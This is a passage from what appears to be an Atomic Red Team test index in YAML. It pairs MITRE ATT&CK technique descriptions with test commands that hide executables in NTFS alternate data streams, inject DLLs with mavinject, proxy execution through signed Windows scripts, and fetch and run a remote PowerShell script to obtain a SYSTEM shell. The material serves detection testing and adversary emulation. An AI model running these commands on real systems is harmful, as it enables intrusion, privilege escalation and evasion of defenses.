* If fail to meet prereq, navigate to T1078.004-2 using "cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
* Open the "terraform.tfvars" file and fill in the variables with your desired values.
* Re-run -GetPrereqs
prereq_command: 'try {if (Test-Path "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate"
){ exit 0 } else {exit 1}} catch {exit 1}
'
get_prereq_command: |
echo "Navigating to: $PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
terraform init
terraform apply -auto-approve
executor:
command: 'New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName
#{resource_group} -Description ''my-test-runbook'' -AutomationAccountName
#{automation_account_name}
'
name: powershell
elevation_required: false
cleanup_command: |
Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
Remove-AzAutomationAccount -ResourceGroupName #{resource_group} -Name #{automation_account_name} -Force
Remove-AzResourceGroup -Name #{resource_group} -Force
echo "Cleanup should be completed. Run 'terraform destroy` to ensure remaining resources are also deleted."
cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/"
terraform destroy -auto-approve
- name: GCP - Create Custom IAM Role
auto_generated_guid: 3a159042-69e6-4398-9a69-3308a4841c85
description: "This atomic will create a new IAM role. The default role permissions
are: *IAM Service Account Get*. The idea for this Atomic came from a Rule
published by the Elastic team.\n\nIdentifies an Identity and Access Management
(IAM) custom role creation in Google Cloud Platform (GCP). \nCustom roles
are user-defined, and allow for the bundling of one or more supported permissions
to meet specific needs. \nCustom roles will not be updated automatically and
could lead to privilege creep if not carefully scrutinized.\n\nThis atomic
will create a new IAM role. The default role permissions are: *IAM Service
Account Get*\n\nReference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml\n"
supported_platforms:
- iaas:gcp
input_arguments:
project-id:
description: ID of the GCP Project you to execute the command against.
type: string
default: atomic-test-1
role-name:
description: The name of the role to be created.
type: string
default: AtomicRedTeamRole
role-description:
description: The description of the role to be created.
type: string
default: Atomic Red Team Custom IAM Role
roles:
description: List of roles to be applied
type: string
default: iam.serviceAccounts.get
executor:
name: sh
elevation_required: false
command: |
gcloud config set project #{project-id}
gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id}
cleanup_command: 'gcloud iam roles delete #{role-name} --project=#{project-id}
'
dependency_executor_name: sh
dependencies:
- description: 'Requires gcloud
'
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
'
- description: "Check if user is logged in \n"
prereq_command: 'gcloud config get-value account
'
get_prereq_command: 'gcloud auth login --no-launch-browser
'
T1480.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995
created: '2020-06-23T22:28:28.041Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1480/001
external_id: T1480.001
- source_name: Proofpoint Router Malvertising
description: Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising
on Windows, Android Devices. Retrieved January 16, 2019.
url: https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices
- source_name: Kaspersky Gauss Whitepaper
description: 'Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution.
Retrieved January 17, 2019.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf
- source_name: 'Ebowla: Genetic Malware'
description: 'Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing
Payloads for Specific Targets. Retrieved January 18, 2019.'
url: https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf
- source_name: EK Clueless Agents
description: Riordan, J., Schneier, B. (1998, June 18). Environmental Key
Generation towards Clueless Agents. Retrieved January 18, 2019.
url: https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf
- source_name: EK Impeding Malware Analysis
description: Song, C., et al. (2012, August 7). Impeding Automated Malware
Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.
url: https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf
- source_name: Demiguise Guardrail Router Logo
description: 'Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved
January 17, 2019.'
url: https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js
- source_name: Environmental Keyed HTA
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
Explorer/Edge. Retrieved November 17, 2024.
url: http://web.archive.org/web/20200608093807/https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:35.768Z'
name: Environmental Keying
description: |-
Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Nick Carr, Mandiant
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1564.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5
created: '2020-03-13T20:33:00.009Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/004
external_id: T1564.004
- source_name: MalwareBytes ADS July 2015
description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams.
Retrieved March 21, 2018.
url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
- source_name: SpectorOps Host-Based Jul 2017
description: Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator
Design. Retrieved March 21, 2018.
url: https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea
- source_name: Journey into IR ZeroAccess NTFS EA
description: Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS
Extended Attributes. Retrieved June 3, 2016.
url: http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html
- source_name: Microsoft NTFS File Attributes Aug 2010
description: Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved
March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/
- source_name: Microsoft ADS Mar 2014
description: Marlin, J. (2013, March 24). Alternate Data Streams in NTFS.
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
url: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
- source_name: Oddvar Moe ADS1 Jan 2018
description: Moe, O. (2018, January 14). Putting Data in Alternate Data Streams
and How to Execute It. Retrieved June 30, 2018.
url: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
- source_name: Symantec ADS May 2009
description: Pravs. (2009, May 25). What you need to know about alternate
data streams in windows? Is your Data secure? Can you restore that?. Retrieved
March 21, 2018.
url: https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:35.944Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Oddvar Moe, @oddvarmoe
- Red Canary
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1564.004
atomic_tests:
- name: Alternate Data Streams (ADS)
auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f4602364f4
description: |
Execute from Alternate Streams
[Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)
[Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)
supported_platforms:
- windows
input_arguments:
path:
description: Path of ADS file
type: path
default: c:\ADS\
executor:
command: |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1564.004/src/test.ps1 c:\temp:ttt
makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab
print /D:#{path}\file.txt:autoruns.exe #{path}\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg #{path}\file.txt:evilreg.reg
regedit /E #{path}\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat #{path}\file.txt:file.bat
esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
name: command_prompt
elevation_required: true
- name: Store file in Alternate Data Stream (ADS)
auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02
description: |
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Upon execution, cmd will run and attempt to launch desktop.ini. No windows remain open after the test
supported_platforms:
- windows
input_arguments:
payload_path:
description: Path of file to hide in ADS
type: path
default: c:\windows\system32\cmd.exe
ads_file_path:
description: Path of file to create an ADS under
type: path
default: C:\Users\Public\Libraries\yanki\desktop.ini
ads_name:
description: Name of ADS
type: string
default: desktop.ini
executor:
command: |
if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) {
New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki
}
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
'
name: powershell
- name: Create ADS command prompt
auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb
description: |
Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt"
supported_platforms:
- windows
input_arguments:
file_name:
description: File name of file to create ADS on.
type: string
default: "%temp%\\T1564.004_has_ads_cmd.txt"
ads_filename:
description: Name of ADS.
type: string
default: adstest.txt
executor:
command: |
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name} >nul 2>&1
'
name: command_prompt
- name: Create ADS PowerShell
auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
description: |
Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, run the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
supported_platforms:
- windows
input_arguments:
file_name:
description: File name of file to create ADS on.
type: string
default: "$env:TEMP\\T1564.004_has_ads_powershell.txt"
ads_filename:
description: Name of ADS file.
type: string
default: adstest.txt
dependency_executor_name: powershell
dependencies:
- description: 'The file must exist on disk at specified location (#{file_name})
'
prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
'
get_prereq_command: 'New-Item -Path #{file_name} | Out-Null
'
executor:
command: |
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
set-content -path . -stream #{ads_filename} -value "test3"
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
'
name: powershell
- name: Create Hidden Directory via $index_allocation
auto_generated_guid: 3e6791e7-232c-481c-a680-a52f86b83fdf
description: |
Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution,
run "dir /A /Q /R" in the %temp% folder to view that the alternate data stream folder exists. To view the data in the
alternate data stream, run "type %temp%\...$.......::$index_allocation\secrets.txt"
supported_platforms:
- windows
input_arguments:
folder_name:
description: File name of file to create inside the folder.
type: string
default: "%temp%\\...$.......::$index_allocation"
hidden_filename:
description: Name of the files containing the hidden information
type: string
default: secrets.txt
executor:
command: |
md #{folder_name}
echo too many secrets > #{folder_name}\#{hidden_filename}
cleanup_command: 'rmdir /S /Q #{folder_name} >nul 2>&1
'
name: command_prompt
T1055.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
created: '2020-01-14T01:26:08.145Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/001
external_id: T1055.001
- source_name: Hiding Malicious Code with Module Stomping
description: 'Aliz Hammond. (2019, August 15). Hiding Malicious Code with
"Module Stomping": Part 1. Retrieved July 14, 2022.'
url: https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/
- source_name: Elastic HuntingNMemory June 2017
description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
7, 2017.
url: https://www.endgame.com/blog/technical-blog/hunting-memory
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Module Stomping for Shellcode Injection
description: Red Teaming Experiments. (n.d.). Module Stomping for Shellcode
Injection. Retrieved July 14, 2022.
url: https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:36.680Z'
name: 'Process Injection: Dynamic-link Library Injection'
description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
DLL injection is a method of executing arbitrary code in the address space
of a separate live process. \n\nDLL injection is commonly performed by writing
the path to a DLL in the virtual address space of the target process before
loading the DLL by invoking a new thread. The write can be performed with
native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
then invoked with CreateRemoteThread (which calls the LoadLibrary
API responsible for loading the DLL). (Citation: Elastic Process Injection
July 2017) \n\nVariations of this method such as reflective DLL injection
(writing a self-mapping DLL into a process) and memory module (map DLL when
writing into process) overcome the address relocation issue as well as the
additional APIs to invoke execution (since these methods load and execute
the files in memory by manually preforming the function of LoadLibrary).(Citation:
Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July
2017) \n\nAnother variation of this method, often referred to as Module Stomping/Overloading
or DLL Hollowing, may be leveraged to conceal injected code within a process.
This method involves loading a legitimate DLL into a remote process then manually
overwriting the module's AddressOfEntryPoint before starting
a new thread in the target process.(Citation: Module Stomping for Shellcode
Injection) This variation allows attackers to hide malicious injected code
by potentially backing its execution with a legitimate DLL file on disk.(Citation:
Hiding Malicious Code with Module Stomping) \n\nRunning code in the context
of another process may allow access to the process's memory, system/network
resources, and possibly elevated privileges. Execution via DLL injection may
also evade detection from security products since the execution is masked
under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Boominathan Sundaram
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.4'
identifier: T1055.001
atomic_tests:
- name: Process Injection via mavinject.exe
auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254
description: |
Windows 10 Utility To Inject DLLS.
Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll.
With default arguments, expect to see a MessageBox, with notepad's icon in taskbar.
supported_platforms:
- windows
input_arguments:
process_id:
description: PID of input_arguments
type: string
default: "(Start-Process notepad -PassThru).id"
dll_payload:
description: DLL to Inject
type: path
default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll
dependency_executor_name: powershell
dependencies:
- description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
'
prereq_command: 'if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
executor:
command: |
$mypid = #{process_id}
mavinject $mypid /INJECTRUNNING "#{dll_payload}"
Stop-Process -processname notepad
name: powershell
elevation_required: true
- name: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load
technique
auto_generated_guid: 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5
description: Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
via function of WinPwn
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
name: powershell
T1556:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f4c1826f-a322-41cd-9557-562100848c84
created: '2020-02-11T19:01:56.887Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556
external_id: T1556
- source_name: Clymb3r Function Hook Passwords Sept 2013
description: Bialek, J. (2013, September 15). Intercepting Password Changes
With Function Hooking. Retrieved November 21, 2017.
url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- source_name: Xorrior Authorization Plugins
description: Chris Ross. (2018, October 17). Persistent Credential Theft with
Authorization Plugins. Retrieved April 22, 2021.
url: https://xorrior.com/persistent-credential-theft/
- source_name: Dell Skeleton
description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
Retrieved April 8, 2019.
url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- source_name: dump_pwd_dcsync
description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
url: https://adsecurity.org/?p=2053
- source_name: TechNet Audit Policy
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:36.944Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network Devices
- IaaS
- SaaS
- Office Suite
- Identity Provider
x_mitre_version: '2.6'
atomic_tests: []
T1216:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1216
external_id: T1216
- source_name: GitHub Ultimate AppLocker Bypass List
description: Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved
April 10, 2018.
url: https://github.com/api0cradle/UltimateAppLockerByPassList
- source_name: LOLBAS Project
description: Oddvar Moe et al. (2022, February). Living Off The Land Binaries,
Scripts and Libraries. Retrieved March 7, 2022.
url: https://github.com/LOLBAS-Project/LOLBAS#criteria
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:37.665Z'
name: Signed Script Proxy Execution
description: 'Adversaries may use trusted scripts, often signed with certificates,
to proxy the execution of malicious files. Several Microsoft signed scripts
that have been downloaded from Microsoft or are default on Windows installations
can be used to proxy execution of other files.(Citation: LOLBAS Project) This
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Wes Hurd
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1216
atomic_tests:
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb
description: |
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
Upon execution, calc.exe will be launched.
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: A PowerShell command to execute.
type: string
default: Start-Process calc
executor:
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
name: command_prompt
- name: manage-bde.wsf Signed Script Command Execution
auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
description: 'Executes the signed manage-bde.wsf script with options to execute
an arbitrary command.
'
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: A command to execute.
type: path
default: "%windir%\\System32\\calc.exe"
executor:
command: |
set comspec=#{command_to_execute}
cscript %windir%\System32\manage-bde.wsf
cleanup_command: 'set comspec=%windir%\System32\cmd.exe
'
name: command_prompt
T1556.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd
created: '2020-10-19T17:58:04.155Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/004
external_id: T1556.004
- source_name: Mandiant - Synful Knock
description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful
Knock - A Cisco router implant - Part I. Retrieved November 17, 2024.
url: https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/
- source_name: Cisco IOS Software Integrity Assurance - Image File Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Image File Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
- source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:38.719Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: Mandiant - Synful Knock)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '2.1'
atomic_tests: []
T1027.015:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--fbd91bfc-75c2-4f0c-8116-3b4e722906b3
created: '2025-03-04T18:29:33.850Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/015
external_id: T1027.015
- source_name: Perception Point
description: 'Arthur Vaiselbuh, Peleg Cabra. (2024, November 7). Evasive ZIP
